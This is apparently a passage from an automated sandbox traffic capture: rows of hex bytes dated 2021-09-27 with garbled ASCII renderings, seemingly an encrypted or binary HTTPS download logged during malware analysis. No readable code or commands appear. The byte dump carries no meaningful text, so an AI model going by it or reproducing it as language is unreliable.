3a 7a d8 06 42 14 49 cc cf 84 68 f4 67 9a eb 2f 9b 15 6f ba 7c 1d 42 93 7a fd f3 95 8e aa 19 36 ea 8b b7 81 23 07 b4 e4 35 74 06 df d5 71 36 c8 42 3c 5a 23 27 32 b3 f9 19 e6 98 b3 dd 46 67
                                          Data Ascii: naT,b<qWAv?Z:uIMtqp,@^DiEBPYE+YyUz+r"v;i=-1HE("OV:f$GL+!,~HHn;:zBIhg/o|Bz6#5tq6B<Z#'2Fg
                                          2021-09-27 15:30:10 UTC108INData Raw: 5c e7 65 a2 06 19 3c fd 73 40 b3 df b7 07 f9 fe 14 7c 17 35 f5 80 08 70 b5 5f 4a 05 4f 40 49 b5 c8 09 ce db 02 d4 eb d6 4c 3c 77 80 e3 37 c1 99 66 b3 2f 16 e6 2b 15 b5 83 a6 fb 1b e5 5f f2 31 f9 30 cd d0 02 d0 79 d3 86 33 10 6d 51 b8 15 47 16 91 85 e7 c7 97 a2 d6 b5 27 e5 6a 2c 0d 08 e9 29 95 fc 78 48 f9 19 81 0f e8 0c 56 65 87 93 5a a3 59 66 ad 44 f3 6a cd 0e e4 a6 09 21 67 47 fb 6a 73 c3 3e 1c 2c 91 1a f0 2b 90 f3 2f 49 5b 62 a9 95 f6 c1 e7 eb f8 1c 56 4b 38 d7 fd c2 3a 31 f9 c9 e0 c1 7f 07 08 ac 73 82 64 12 cd 95 d7 48 1d 4a dd 53 5c 71 d5 f0 cd 6b 61 12 b9 8b 14 05 73 8b 08 a3 c0 9a fc 25 c2 38 5e 22 7e 09 cd 02 5f fc c4 29 c4 3b 3d e7 3f ec f4 e5 79 db 4f 23 69 29 e4 82 37 fc f1 83 66 6e cc 95 72 3f 3a e1 ea 6f 69 5a 45 59 42 ff 54 68 90 78 3d 76 1e
                                          Data Ascii: \e<s@|5p_JO@IL<w7f/+_10y3mQG'j,)xHVeZYfDj!gGjs>,+/I[bVK8:1sdHJS\qkas%8^"~_);=?yO#i)7fnr?:oiZEYBThx=v
                                          2021-09-27 15:30:10 UTC109INData Raw: 78 40 f5 68 34 70 6e ab d5 27 78 c9 c8 ce 10 6e 07 66 5f 75 4d 27 cd a5 55 25 cd 28 38 bd 6e c6 54 02 2e 85 73 80 c8 a7 76 80 46 cb 40 12 16 b1 58 c5 3b dd 60 5f e8 da fe 5b 63 a0 f7 e8 5d 8f cf e9 de bb b3 34 e3 b3 9e 29 ad 0a 97 e4 7a f5 ac 03 02 75 c8 bc 5a 60 50 56 c3 10 e6 2b ca 2a 40 1c 72 f6 42 dd 82 71 1c d4 4a b3 d1 d5 ff 94 c6 a6 76 c9 d9 e4 60 aa 26 50 cf 56 e5 13 5b a9 be d6 fe f5 26 a6 e0 7f b3 0b b5 da 84 41 36 b3 9e f7 37 a1 04 d7 99 32 f9 27 1d e8 ca bf c3 f7 a3 5f 56 16 02 96 1f 98 af 5b 2f 81 f6 13 7f 7a 4e a5 0d ed 14 56 29 82 5f c2 d4 56 47 e0 58 b4 f9 01 d5 24 cb 1f 92 72 2e 0b 8d 2a c0 12 ad 34 ad 58 5e d2 f2 12 a3 c0 ee 8b e7 6e 04 39 40 f5 2f 43 14 4a b2 38 92 40 46 78 8a f2 12 3a 04 6b a5 66 e9 57 97 6b fa 88 bb 94 27 1a 30 85 d9
                                          Data Ascii: x@h4pn'xnf_uM'U%(8nT.svF@X;`_[c]4)zuZ`PV+*@rBqJv`&PV[&A672'_V[/zNV)_VGX$r.*4X^n9@/CJ8@Fx:kfWk'0
                                          2021-09-27 15:30:10 UTC111INData Raw: fd f5 97 d0 60 7e cf 24 f4 33 5a 69 24 92 6b b5 e1 eb be ba 6c e1 7c 52 89 5d a8 09 07 e1 28 65 b7 16 13 e2 ec 4d 58 8c df 0d 0d f4 e8 f1 54 2f 24 dd 81 d3 70 b5 61 62 c7 4d 01 5f 9d d9 09 ce d1 0f aa 78 d6 4c c5 7a 89 f7 ec cc 9c 66 a5 38 9b e1 31 15 b4 91 bb da 18 f3 f3 fe 34 f9 dc 6f c1 15 ec 9e c3 ae 96 1a 6f 20 b7 05 47 12 b3 a1 e0 b3 f6 8f da b6 33 03 6b 2c 03 33 de 02 a5 e7 59 25 40 3e 80 05 c4 35 a2 61 8d 86 76 8f 48 62 b3 44 cc 6f cd 02 df 4c 7d 93 65 46 e5 75 65 84 79 1d 2c 9d 3e 6c 23 92 82 20 d4 5b 66 8b 6d e3 c6 8e 04 dc 1c 5c 6c 90 ba e9 d3 37 9a 83 ec c8 f7 53 0b 13 a6 01 91 91 16 cc fc 82 33 3a 41 01 5f 7e 5b c4 d5 e3 74 45 12 b3 92 7e 9e 7e 8e 02 7b c6 9a f3 25 c2 38 a8 1a 78 23 c7 dc 5e c8 fc 29 c6 31 dc ed 72 49 f2 f4 16 8c 4f 23 63 f5
                                          Data Ascii: `~$3Zi$kl|R](eMXT/$pabM_xLzf814oo G3k,3Y%@>5avHbDoL}eFuey,>l# [fm\l7S3:A_~[tE~~{%8x#^)1rIO#c
                                          2021-09-27 15:30:10 UTC112INData Raw: b1 d7 9b dc 84 1c cb a0 8e 53 56 08 3b 12 0d 8e 39 86 ec 32 44 bc 28 cc 72 55 37 0c c7 71 59 8c 8d 3c d2 79 8d d1 29 69 cc f4 8d 05 e3 2e 4e 71 76 5e 31 b3 cd 43 32 5b 9b 39 a0 51 b7 47 08 35 a9 73 81 ef f5 4b 96 7f cd 56 88 15 b6 49 cc bf ba 65 85 fb d3 c5 43 5b 19 fd c0 69 9f c6 f2 a6 33 ac 24 d0 49 96 36 c7 08 97 e5 2c 94 a8 da 9e 57 d9 b0 4c a5 cd 58 da 29 08 3c a5 86 4a 0d 70 3f 93 df 85 ee a7 ca 28 3e c4 d7 77 a6 cc af 72 c7 c1 3a a9 b6 72 ad 56 78 ec 02 56 b7 72 2f 6d da 0e 4f e0 77 91 30 a5 d2 56 bf 92 ba b6 a6 3d 89 b6 d7 9f 57 20 2f 35 b9 da b1 d8 ff dd c9 8c 00 67 71 15 86 b8 3f b4 37 20 0e b6 60 9a 2e 49 27 16 57 30 9e 41 d4 cc 56 45 2c 50 f3 15 01 d5 28 f2 03 85 63 29 06 8c 30 43 ca ef 2e ac 52 3b 0a ff 9c 1e 5a e0 93 e5 14 20 34 78 a7 3c 50
                                          Data Ascii: SV;92D(rU7qY<y)i.Nqv^1C2[9QG5sKVIeC[i3$I6,WLX)<Jp?(>wr:rVxVr/mOw0V=W /5gq?7 `.I'W0AVE,P(c)0C.R;Z 4x<P
                                          2021-09-27 15:30:10 UTC113INData Raw: 2c 7e 29 b4 a2 36 58 e6 3e dc bd 1b d2 26 89 f7 bb cf eb e2 fc 4b 47 b9 d6 d5 2f 73 87 c4 c6 88 92 94 a1 e3 04 d7 25 90 6e 4b 6c 6a ad e7 81 54 46 61 e1 7a 3d 58 5f a8 03 10 ae d2 b7 a0 0c 19 8d 17 57 68 82 09 ba 12 b7 fb 15 54 3e 3e ea a5 28 71 9f 78 49 8b f8 08 4d 63 12 1a ca c4 32 c7 e0 d6 5d c4 69 8e 1d c5 ec 94 77 a6 30 26 89 c8 14 b5 84 a2 c4 0d ee db e2 3a e1 24 cc fc 1a 8b 8a d5 86 33 11 76 39 94 14 56 19 a6 ba 19 c6 b1 9e dd d8 a0 c3 6b 2a 18 25 b6 f9 97 f6 54 55 93 2d 8b 0f fd 2f bd 4f 79 94 5e 92 50 7e 71 6f cb 7d 1b 95 1f c2 f4 24 5b 98 f3 61 71 b3 f5 0e 27 97 07 fc 3c a5 76 09 64 50 15 81 63 f2 c7 f2 cb c3 24 45 4a 57 75 f4 dd 73 11 b9 c0 c0 ff 68 d1 0f be 30 b9 9a 16 dc 98 ca 2b c4 4a f1 59 7d 92 07 f3 c2 54 93 83 6f 8c 64 af 62 80 02 6c c7
                                          Data Ascii: ,~)6X>&KG/s%nKljTFaz=X_WhT>>(qxIMc2]iw0&:$3v9Vk*%TU-/Oy^P~qo}$[aq'<vdPc$EJWush0+JY}Todbl
                                          2021-09-27 15:30:10 UTC114INData Raw: a9 c8 a7 87 2a 02 bc 3e b7 1f fd cf d1 68 27 28 50 1b 4a 30 57 05 84 07 1c d2 fb 58 d7 5a 2d 3c f9 49 86 e0 6c 56 ea 3c 9a ae 0f 8d d2 a9 02 ed a6 39 45 de 49 63 e2 b6 42 e8 76 d4 87 ba b6 4f ad 22 2b d7 94 43 86 9c ae ab 77 0d c4 31 b7 2e ce b6 79 7b e6 eb fe 31 9b 3f 2f b2 6b cd 5a 24 d5 a3 43 cd d0 b1 67 74 61 e4 b6 4a 32 4d a7 a1 fd 76 c1 10 5d 3c f2 32 94 fe 0b c1 f7 a3 bc 4f 18 d3 f1 36 4e 6a 5b 7a 75 0c 9e 94 55 91 8e 52 86 00 ac a5 59 83 fb 1b c5 a1 c1 ac ff 95 09 b0 8c 01 e4 93 b7 90 b4 cf f6 7c 45 7d 2a 32 88 d9 79 ab cf 33 d5 2d 77 97 25 bc 60 ae e8 91 ed 2b 73 e5 63 60 9a 56 a8 18 0c 6b a4 9b a3 20 1a da c4 ab 97 7b c0 ad 1e ff e8 0f 5f 34 cb f4 a6 d0 66 a0 71 56 16 44 01 44 be df f7 cf f7 01 cc f8 dd 4c de 7d 9f d6 3a c1 b5 6f 9b d1 ea 19 ce
                                          Data Ascii: *>h'(PJ0WXZ-<IlV<9EIcBvO"+Cw1.y{1?/kZ$CgtaJ2Mv]<2O6Nj[zuURY|E}*2y3-w%`+sc`Vk {_4fqVDDL}:o
                                          2021-09-27 15:30:10 UTC115INData Raw: 63 ff ef fb 6b be f0 87 4a 4c c5 ad 92 17 1e e1 e8 1e 04 6a 45 5d 5e ce 91 79 94 50 0a 0c 39 e1 2a 0f 0f 6e 30 c3 dd bf 49 43 92 61 5f 45 61 f1 e7 11 94 59 92 9c ce af d6 75 b1 0a 8d 89 27 f8 f5 8d 60 1b 78 94 f8 93 65 92 b0 13 d8 7c 21 57 0d ef b2 45 8f ef 25 98 0e 08 83 21 44 25 a9 68 20 01 8e 6e f1 61 36 9d 6c 7d c7 09 62 01 97 1d 1f c2 12 07 32 01 06 ce b0 f2 37 d2 48 c9 ac 52 33 40 79 e8 3a 2a af 37 05 81 44 89 ae 3d 53 40 ae 11 16 b2 75 83 1e 2f 1b ee 9d cc ac 81 ec 38 81 5f 2c 6c e5 ea 07 e1 c0 f4 d2 c1 6e d9 74 ce a2 20 f1 ca c2 43 5c 0e 3f 06 81 8d 39 88 ec 35 4f 4c 05 1b 63 55 31 c7 14 69 5f e6 65 c3 d3 53 af c5 2e 55 0d 22 25 f8 fe 3b 63 5f 65 5b 21 22 b4 6f 31 46 2a 2d aa 57 64 4b 09 da a2 4e 92 f5 32 62 10 a9 3b a9 81 3d 9f 8d 3b ce f2 7a 75
                                          Data Ascii: ckJLjE]^yP9*n0ICa_EaYu'`xe|!WE%!D%h na6l}b27HR3@y:*7D=S@u/8_,lnt C\?95OLcU1i_eS.U"%;c_e[!"o1F*-WdKN2b;=;zu
                                          2021-09-27 15:30:10 UTC116INData Raw: 02 52 1f 59 8b b5 86 68 f8 6f 07 ff 2b 9b 05 78 a9 66 ef 55 ae 6d e7 12 95 9e aa 1d 3a 27 c9 ba 95 3d 1c bd c0 8e 70 06 c4 ce 79 2b 3b 43 01 47 3e 48 e4 b3 d5 13 ef f1 5e 47 6e 7c e6 04 bc 75 e0 4e 56 ec 3c 9a a8 09 78 2d 84 30 fb da 1f be df 4d 73 fc 18 d4 3e fb fe 91 b8 cc 0a b3 2e 3c 52 23 7a b8 80 50 a0 41 12 d8 3b b9 13 91 11 7d 85 35 ff fc 3f 8c f8 37 a8 57 3d 48 05 de b1 47 c5 16 de 75 5c 0b d4 75 c0 32 5c ad 96 d6 88 c0 36 7e 23 f8 25 44 76 95 c2 e8 e3 ae 57 1f d3 fd 3f 6c 36 4b 51 73 07 bf 9d 83 99 92 e1 93 2f ac ac 4a 82 f5 35 c2 82 40 bf f4 8d e1 3c a7 11 e3 fd 59 85 a0 e1 43 3c 78 8d fd dc 97 d0 60 02 de 25 cd 34 57 6f 30 84 72 20 ce 86 3b bb 73 e9 6d 5a 9f 4a 34 18 0f 63 aa f9 b3 04 0b f5 71 47 60 93 f7 10 0d f4 e2 38 4b 3e 26 f8 8a c7 7d a8
                                          Data Ascii: RYho+xfUm:'=py+;CG>H^Gn|uNV<x-0Ms>.<R#zPA;}5?7W=HGu\u2\6~#%DvW?l6KQs/J5@<YC<x`%4Wo0r ;smZJ4cqG`8K>&}
                                          2021-09-27 15:30:10 UTC118INData Raw: 7d cc a3 ce 3d 3c 33 5a 13 0d b0 c7 dc 55 df e5 3a c1 31 f2 e8 27 c9 0c e3 3a 87 46 32 67 7b 51 cb 39 e2 fb 94 4b 9a d9 90 6e e9 1f cd ef 73 4c 70 56 5c 48 d7 9d 76 6e 79 13 05 30 fc fe 13 14 1a 65 c7 dd aa 4e 5d 17 23 72 4d 74 88 a9 81 98 40 89 b3 d1 b5 c0 69 4f 1a a4 97 db ea dd 99 70 09 a2 92 2b 03 b0 93 9c 07 d3 4d 25 57 0d f8 bf de 5a ee 09 9a 79 cf 84 21 5f 06 ae 85 24 2d 9a 7d eb 85 24 b4 6f 74 d1 16 9c 11 be 17 e3 b8 79 03 19 8d 18 a6 f3 f3 26 d3 84 3d b6 6d 35 57 7b e8 25 32 54 29 23 79 4d 8f b3 1c 45 7d fe ff ec 53 8c ed e0 3d 19 e6 cc 8a b6 b1 ed 3b 68 22 6a 6d 18 ee 18 f9 d1 7f 65 d3 e5 73 5c d8 54 20 25 3c ac 42 5c 0b 36 7f c0 8e b7 3b cc 03 4d 64 3a 19 75 58 2d 5a a6 6a c0 54 51 25 d3 7f af c1 22 b7 d6 f9 f2 30 e3 28 6c 53 60 54 1f e4 b5 43
                                          Data Ascii: }=<3ZU:1':F2g{Q9KnsLpV\Hvny0eN]#rMt@iOp+M%WZy!_$-}$oty&=m5W{%2T)#yME}S=;h"jmes\T %<B\6;Md:uX-ZjTQ%"0(lS`TC
                                          2021-09-27 15:30:10 UTC119INData Raw: 2f 78 05 a6 77 37 01 b4 82 4e a5 8f 38 84 9b 57 c3 f9 8b 99 4b d1 8b e6 7c 34 24 5b b5 38 cf 2b 4d a3 35 26 79 dd 6c 9e ec 03 38 04 6b af 63 cb 87 bc 6b f9 9e 30 88 aa 1d 31 91 cc a2 a9 8a 0b ab e2 0e 61 06 ce db 7d 34 3f 57 38 89 22 5c 1c a5 74 1a fe f7 48 ce 65 7c c5 12 a0 f5 c0 5b 45 e0 9e 9a 86 04 92 38 80 8d f9 a1 5c ab f7 8a 66 f5 6a 42 b3 fc ff 87 bb a4 61 a3 0c 2e cb 18 6d 8d 81 51 08 4a 23 c1 2f bc 36 2d 1c 83 8e 0d dd 29 39 9b 28 32 20 4f 33 5b 09 ca b4 5e f2 a5 20 74 7a 56 d1 a5 41 38 4f a7 af c7 a0 9b 3d 56 35 d3 0b 40 6f 1e aa 70 e3 af 4e 09 ce 8e 3b 6a 94 41 47 6f 7b 85 8c 83 82 b0 57 80 28 b2 b7 54 9d 34 bf d6 aa c0 95 e0 8b f7 bb 88 0d e0 fc 4b 88 39 ce e0 3c 79 94 f6 dc b4 c6 7b ad e7 33 de 32 4c cb 35 b3 7c d3 ad 87 3b be c2 f0 5f 4a 96
                                          Data Ascii: /xw7N8WK|4$[8+M5&yl8kck01a}4?W8"\tHe|[E8\fjBa.mQJ#/6-)9(2 O3[^ tzVA8O=V5@opN;jAGo{W(T4K9<y{32L5|;_J
                                          2021-09-27 15:30:10 UTC120INData Raw: a1 a1 74 a0 b9 3c c8 93 d3 25 12 a3 df 57 7e ad 38 f2 cb 49 6d a1 b9 81 71 9a 6c 9a 1e 69 e4 35 c8 25 c4 24 fb 1d 7e 09 c6 c8 4b c0 d4 8a c4 31 e9 c5 a4 c0 f2 e8 05 96 5e 3f 77 dd ce fd 10 fb e7 0a 49 9a c8 94 60 03 0a c9 49 65 41 61 6d 71 4d c6 9e 7e b8 89 3e 0d 33 c7 64 0f 17 07 5e 45 de bb 4d 57 64 25 5e 45 64 98 b4 04 bc fe 9a b6 db b0 ed 8c b5 1b 8e 89 54 fe d9 83 62 1f 81 92 0d 08 66 c5 b2 12 d2 c7 23 71 1a d6 99 50 71 e8 ab 8a 35 0f 92 35 7d 83 b0 96 2b 05 17 78 fc 71 0d 97 6e 6c c4 00 87 12 9e 24 f7 bb 55 0c 08 e3 fa 4a 09 2d 39 c4 b7 3d a1 6c 36 40 73 82 72 23 51 3c f5 f4 ba a2 b1 31 53 56 bf 13 02 b6 a3 d5 30 3d 1f c4 c8 88 ad 87 87 43 57 22 60 45 ea ec 18 ee bc 06 d3 d0 6d d7 9c de 98 58 0f b0 87 44 4a 65 ef 7f c7 86 56 70 e5 23 4a 72 5f c8 61
                                          Data Ascii: t<%W~8Imqli5%$~K1^?wI`IeAamqM~>3d^EMWd%^EdTbf#qPq55}+xqnl$UJ-9=l6@sr#Q<1SV0=CW"`EmXDJeVp#Jr_a
                                          2021-09-27 15:30:10 UTC121INData Raw: 0e 78 bf 7c ab 48 b3 04 a5 67 8b 2c 3d fe 03 57 2b 98 53 3b c3 6b 4c e0 55 88 ff 13 c2 2e cb 03 9b 4b dd 14 b0 2b 5f af 94 3a 9d 55 4b ea ec 8b 14 5d c6 94 f4 91 16 19 66 b2 27 52 1e 22 4f 36 84 62 91 ff 8b f8 21 83 6b e3 a4 77 e9 2c 36 6a ff 82 b1 90 be 0e 27 85 c9 a1 9e 31 f5 aa c4 2c 79 3f 6b d1 6e 38 29 5a 03 5d 21 4d 0d ad ef e3 ff db 46 d5 6e e2 e7 04 bc 43 72 5b 45 e1 23 9c b6 07 86 3d bf 39 07 a0 7a bc c7 5a 72 f5 7d 42 21 d2 01 86 96 bd 52 a6 39 ee cf 80 4d a7 92 47 aa 4a 16 ca 36 56 1f a2 0b 92 81 31 de e8 3a 9d 06 00 ad 48 39 73 9d de a0 40 c9 0e 3f 7a 63 69 c0 b4 56 2d 7c 52 bf ee 9c d1 32 28 73 fa 25 46 7e 17 ed f4 e1 af 42 0b c9 e5 08 79 83 5a 47 73 10 87 72 82 b5 93 30 74 29 b4 a2 4a 8f fb 2f c5 bd c1 ac e3 92 09 b0 8c 18 9d 6f 4d 91 be c5
                                          Data Ascii: x|Hg,=W+S;kLU.K+_:UK]f'R"O6b!kw,6j'1,y?kn8)Z]!MFnCr[E#=9zZr}B!R9MGJ6V1:H9s@?zciV-|R2(s%F~ByZGsr0t)J/oM
                                          2021-09-27 15:30:10 UTC123INData Raw: 23 88 88 08 49 5b 66 81 61 6f c1 e1 c3 b1 1d 56 41 5d 66 ff c2 3f ef b8 ec d2 f6 7f 06 19 91 7d aa cb 17 cd 93 d0 32 3a 5a df 5d 76 93 be 11 ca 43 4f 0d e6 b2 73 b4 66 e4 0a 7c cc b8 c1 23 ea ae 76 1a 74 21 a1 dd 5f de f1 5a e2 30 e3 e7 2b c4 e3 e6 02 a4 67 27 63 f3 f1 74 17 fd f1 86 5d 9c d9 93 62 14 bc f0 ec 71 55 43 8d 58 48 cc 89 6c 84 50 16 09 39 ed 3f 93 0c 13 76 c3 ce bd 5a 47 ff 35 d2 ce 65 8c a1 b2 85 5b 8e a2 f9 6c c4 70 bb 0a 8c 85 f1 d3 dd 83 65 1b 2f 84 2e 1e 4f 81 b6 03 d2 73 36 f0 1c f8 a3 46 59 26 08 9b 1c 0a 82 35 7d 0b b4 96 27 3a 06 7f fc 7b 24 8b 6a 7d c4 05 8b 8c 37 0c 1d b8 f7 17 34 11 10 9d 3e f2 37 dc 83 c7 a3 69 1a 44 68 eb 33 ae 56 36 29 86 58 b7 a5 1f e3 45 ae 0a 07 84 36 81 32 3b 00 61 e1 8a ad 80 fb 3d 46 24 7c 64 47 ff 1e ff
                                          Data Ascii: #I[faoVA]f?}2:Z]vCOsf|#vt!_Z0+g'ct]bqUCXHlP9?vZG5e[lpe/.Os6FY&5}':{$j}74>7iDh3V6)XE62;a=F$|dG
                                          2021-09-27 15:30:10 UTC124INData Raw: 30 98 9d 8c 6c 0f 06 e3 79 3d 89 b8 d7 9b 43 6e 2c 35 b7 e3 e7 cb f4 c6 ba d5 17 08 81 11 90 bc 2b 22 37 20 00 a7 16 1c 29 26 e9 3c ba 38 8f 44 c7 c7 c9 fd 8b c0 9d e1 04 d7 2c a1 92 85 63 27 3d c4 23 4e af f8 a9 ad 58 50 e9 ff 9c 07 7c d3 8b da 6e 17 35 71 a2 2e 52 02 5e a7 0c ab 69 fe 78 8a e9 2f 81 fa 6a 89 79 e1 38 c0 6a ff 8c 95 d8 a8 1d 3a 9e cb b2 81 38 0f b4 e2 d8 71 2a c1 d3 15 b9 37 43 14 62 76 5e 1a b8 e6 16 ed f3 49 cc 42 72 ef fa b7 55 f5 53 7c 88 3c 8b a5 0f 8c 3f ac 2e e8 a5 41 41 de 65 66 ed 7f 51 3e ea fb 98 b7 49 42 9e 21 3a a7 11 53 8d 85 78 fd 59 01 df 24 a6 0d 8a 1c 92 80 05 0b ec 16 9d 29 08 a6 55 20 5f 08 cf a4 54 24 07 0c 61 72 05 41 a4 41 36 22 de bf c2 82 e8 45 57 3f f1 29 5d 66 0b c1 e8 f2 ab 5d e6 c3 d6 2f 6c b8 73 4c 77 0b 97
                                          Data Ascii: 0ly=Cn,5+"7 )&<8D,c'=#NXP|n5q.R^ix/jy8j:8q*7Cbv^IBrUS|<?.AAefQ>IB!:SxY$)U _T$arAA6"EW?)]f]/lsLw
                                          2021-09-27 15:30:10 UTC125INData Raw: 65 98 98 e8 a2 74 69 81 73 cf 4a 43 04 c9 c1 65 99 4d 6a f3 61 77 86 b4 63 b5 96 16 f3 3c 9c 12 2d 65 54 40 9e 6f d2 59 e1 c3 dc 03 5c 69 7a 66 ff c4 1a 81 c6 75 c9 f6 7b 18 0d 3b 51 87 9e 30 d2 9c f5 91 3a 4b dd 48 66 ad fc f2 cb 45 6f 7c c7 18 7a b6 75 94 12 e7 e9 9f c4 03 dd 22 56 ae 7e 09 c7 c3 4c fc d1 2b c4 37 c9 87 46 59 f3 e2 12 93 5e b9 46 d8 e8 df 0f ec d1 40 4e 9a c8 8d 5c 3a 1c e1 ec 4f 2b 15 dc 58 48 c2 87 7a 0a 5d 12 03 1f f4 3a 3e c2 13 76 c2 c0 93 66 43 e9 24 74 2b 1b 15 a1 10 90 42 89 2c f4 89 ca 56 ae 08 a8 41 d9 f9 d9 9c 72 24 8f 81 2e 18 64 f8 ce 8b d5 65 36 4d 19 64 92 7f 7f c8 16 8f 36 fa 86 21 55 3d 98 bb 23 2d 8d 52 92 05 bc 99 6c 68 dd 06 06 25 96 03 3b a6 40 26 da 05 04 b5 e9 fc 1f fb 90 c3 b1 6b 58 3e f1 ec 25 27 4e 20 b3 a2 61
                                          Data Ascii: etisJCeMjawc<-eT@oY\izfu{;Q0:KHfEo|zu"V~L+7FY^F@N\:O+XHz]:>vfC$t+B,VAr$.de6Md6!U=#-Rlh%;@&kX>%'N a
                                          2021-09-27 15:30:10 UTC127INData Raw: e5 74 c2 94 c0 8d 10 a8 50 e3 7f a1 66 bb d9 4c c8 1d 7c b0 99 95 dd c8 26 a6 f6 5f b6 3a b4 dc a4 03 ff 28 9f fd 38 96 82 4f bc 15 e4 0b 2a 8d eb 0f cb f4 cc d0 7e 3b 0a 85 12 ac d4 2e 38 37 20 00 ba 52 02 0d 0b e3 32 48 05 af ff c7 c2 47 56 de 6b 9e e1 06 ff 40 a4 8d 85 63 27 0a dc bb 6b 88 8a 0a b3 18 74 74 fd 9c 14 53 c2 a3 ca 6d 17 33 52 cd 50 da 15 4d a7 2b c5 f2 db 55 85 de 34 da 24 a1 a7 77 e3 5c b4 43 d2 8a bd 89 80 73 4e 1c d9 b6 85 36 49 31 cd 0b 7f 20 d1 93 4e ed 34 43 10 55 2e 74 37 b0 f9 1b d4 99 37 44 47 6d e2 1b f5 e3 da 76 4a c7 23 c8 85 f4 84 2c a8 31 f5 89 7b bd df 4f 4f 9f 12 cc 3f fb fb 98 fe 2d 66 9f 20 1e c3 d0 72 7d 83 50 aa 40 29 f8 39 a8 18 a4 76 fd 1d 18 f5 e9 25 de b4 01 80 46 15 44 4d fe 55 48 da 06 3b 5c 5d 7c c0 a3 6b 5c 22
                                          Data Ascii: tPfL|&_:(8O*~;.87 R2HGVk@c'kttSm3RPM+U4$w\CsN6I1 N4CU.t77DGmvJ#,1{OO?-f r}P@)9v%FDMUH;\]|k\"
                                          2021-09-27 15:30:10 UTC128INData Raw: 29 6c 20 ab e7 c3 82 e3 40 92 71 cd 4d 33 65 00 2a 2d 95 f6 41 5f aa 13 82 0f ea 0e c8 1f 1e 94 72 83 46 0b 3d 49 ef 64 eb 1b a4 e1 72 96 65 47 ed 49 5c ae da 1b 06 f9 68 6e 22 92 8c 17 26 c1 43 ac 6e d4 de 8f e3 d2 19 56 41 48 74 d7 ef 32 ef be c6 a2 88 e6 06 02 a5 6b c5 0b 33 e0 9d f3 2c 55 6b c3 52 74 85 cc d8 e6 41 45 14 93 ef 05 2f 70 8b 06 62 bc 28 ee 08 cd 14 69 6a 5e 2c c2 dc 5f cb ed 01 e9 33 e3 eb 12 aa 8c 7b 17 8c 4b 3c 12 6f c3 d4 1e db ee f6 6e ac cd 95 74 0a 36 cc e8 65 47 41 2b 27 d1 c7 98 6c 8f 0a a5 28 14 e4 0e 01 79 33 4b c7 dd bb 54 58 c1 0f 5c 45 63 a6 ce 6e 0d 5c 9a b2 ce d7 5f 55 9c 14 ae 8e aa d9 8f 86 63 0c bd 8e 06 33 4c 92 b6 38 ba 1b ab 53 0d fa a8 26 eb cb 24 94 30 04 f2 01 36 25 b0 96 3e 3a a3 55 fe 7b 23 b2 06 12 5b 12 9c 04
                                          Data Ascii: )l @qM3e*-A_rF=IdreGI\hn"&CnVAHt2k3,UkRtAE/pb(ij^,_3{K<ont6eGA+'l(y3KTX\Ecn\_Uc3L8S&$06%>:U{#[
                                          2021-09-27 15:30:10 UTC129INData Raw: 6f aa f3 af c8 c8 bc 5b 53 d8 40 ca 01 f6 15 88 8e 42 1a 52 65 3b 55 8a ff af f2 69 2f cd 59 5a b1 eb b6 5c f6 5e e2 7f a5 59 16 44 69 e5 09 72 82 a6 b5 74 e0 a4 d8 78 76 9b 3c 94 42 8e 69 81 2b bb d0 2d af 9c 4d 99 38 ea 0d a1 b4 cb bf d0 dc e1 c5 56 10 22 03 6a 1f bf 50 a5 16 b9 04 a5 6d 02 0d 0b ff 32 77 a3 8f 4e c5 e2 d0 4d f6 46 83 eb 28 f8 2c da 12 ae e5 5d 8c 9d 21 4a 85 1f 2c ac 58 ce e6 d2 8e 32 6c 4b 8b e7 6f 37 94 7f a3 2e 5c 1e 65 8e 36 84 6e d4 fe f4 61 2a 9b 00 4b 3e 77 e3 43 25 4e d2 9a 9b af 31 1d 30 85 f8 1d 86 29 0b b4 e2 0e 5d 04 ce d7 44 be 48 da 11 4a 25 7c 86 b2 f9 1d 64 d2 64 cf 60 4d 7a 04 b6 79 df ee 42 e1 3c 94 a8 38 ab 2e a8 28 d3 23 28 26 de 49 61 d5 f1 55 3e fb 65 a2 97 a6 65 92 b3 38 dc 94 72 4f 86 50 aa 41 29 f8 39 a8 18 a4
                                          Data Ascii: o[S@BRe;Ui/YZ\^YDirtxv<Bi+-M8V"jPm2wNMF(,]!J,X2lKo7.\e6na*K>wC%N10)]DHJ%|dd`MzyB<8.(#(&IaU>ee8rOPA)9
                                          2021-09-27 15:30:10 UTC130INData Raw: 87 d6 86 9c 26 66 65 02 00 13 ac ab eb 3a 3d 19 f5 ce a7 af 81 ee 11 d1 5c f3 6c e5 ea 38 45 d3 f1 d2 4a 4e e9 98 e9 ae 9a f3 b1 87 62 30 02 3d 7d d8 83 11 a1 e6 23 4a 4e b2 64 fa 5e 2f d0 31 c7 4e e3 79 a7 f7 52 b4 e0 08 c7 c6 dc da 27 98 20 66 5f 6c 76 1a de b5 45 18 d7 47 b1 ab 46 65 74 ad 24 a3 62 0a fb 1a 48 b9 77 6b 56 88 3e 80 25 cd 31 0d 6d 56 c0 ec d4 4f 65 8a 7b be f0 8f cf e7 8a 19 b3 34 f8 3a b2 1b df 26 a6 5d f4 42 bb f5 09 56 c8 bc 44 7a 7f 6a c8 01 e7 17 27 f2 db 1d 78 e3 65 7d 8b ff ab 48 db 02 dc 7f e0 25 c6 a7 7a f6 46 ea 7f a5 63 ae 6e 6b e5 15 70 2d da 2c 73 ca 22 86 53 77 9b 38 2e ff a3 78 a7 91 2c fd 3c 89 9c 46 91 38 ea 3a 1d 9e c9 bf cf de 4e b9 cf 17 08 81 34 35 be 50 a1 ac 05 29 b4 4b b8 9b 26 ed 14 77 ae 87 4e c5 db 6f 67 f4 46
                                          Data Ascii: &fe:=\l8EJNb0=}#JNd^/1NyR' f_lvEGFet$bHwkV>%1mVOe{4:&]BVDzj'xe}H%zFcnkp-,s"Sw8.x,<F8:N45P)K&wNogF
